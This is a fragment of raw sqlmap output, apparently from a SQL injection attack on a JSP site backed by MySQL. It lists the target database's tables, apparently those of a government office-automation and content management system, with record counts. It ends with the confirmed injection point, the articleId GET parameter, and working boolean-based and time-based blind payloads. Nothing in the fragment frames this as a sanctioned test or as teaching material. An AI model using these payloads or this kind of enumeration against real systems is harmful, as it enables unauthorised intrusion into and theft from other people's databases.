| org_role                    | 5       |
| wf_transitionrestriction    | 5       |
| cms_advert_place            | 4       |
| cms_arti_state              | 4       |
| cms_tmpl_file_operation     | 4       |
| ttype                       | 4       |
| wf_workflowprocess          | 4       |
| cms_advert                  | 3       |
| cms_arti_source             | 3       |
| cms_ques_topic              | 3       |
| cms_role                    | 3       |
| cms_site                    | 3       |
| oa_maturity_alert_settings  | 3       |
| tarea                       | 3       |
| telt                        | 3       |
| tsession                    | 3       |
| wf_activity                 | 3       |
| cms_content_style           | 2       |
| cms_ip_limit                | 2       |
| cms_ips                     | 2       |
| cms_member                  | 2       |
| cms_member_group            | 2       |
| cms_ques_item               | 2       |
| cms_site_tmpl_task          | 2       |
| cms_vote_item               | 2       |
| oa_equipment                | 2       |
| oa_relationobject           | 2       |
| org_group                   | 2       |
| tcode                       | 2       |
| cms_arti_draft              | 1       |
| cms_arti_draft_channel      | 1       |
| cms_arti_draft_content      | 1       |
| cms_arti_keyword            | 1       |
| cms_arti_rela_word          | 1       |
| cms_arti_type               | 1       |
| cms_filter_word             | 1       |
| cms_interview               | 1       |
| cms_interview_guest         | 1       |
| cms_messagecategory         | 1       |
| cms_publish_task            | 1       |
| cms_questionnaire           | 1       |
| cms_seq                     | 1       |
| cms_synch_oa_channel        | 1       |
| cms_version                 | 1       |
| cms_vote                    | 1       |
| gov_receivedocumentbaseinfo | 1       |
| gov_senddocumentbaseinfo    | 1       |
| oa_pigeonholeset            | 1       |
| oa_seq                      | 1       |
| oa_unitinfo                 | 1       |
| org_domain                  | 1       |
| org_manager                 | 1       |
| security_dog                | 1       |
| tfield                      | 1       |
| tmodel                      | 1       |
| tpage                       | 1       |
| tseq                        | 1       |
| ttable                      | 1       |
| wf_workflowchannel          | 1       |
+-----------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11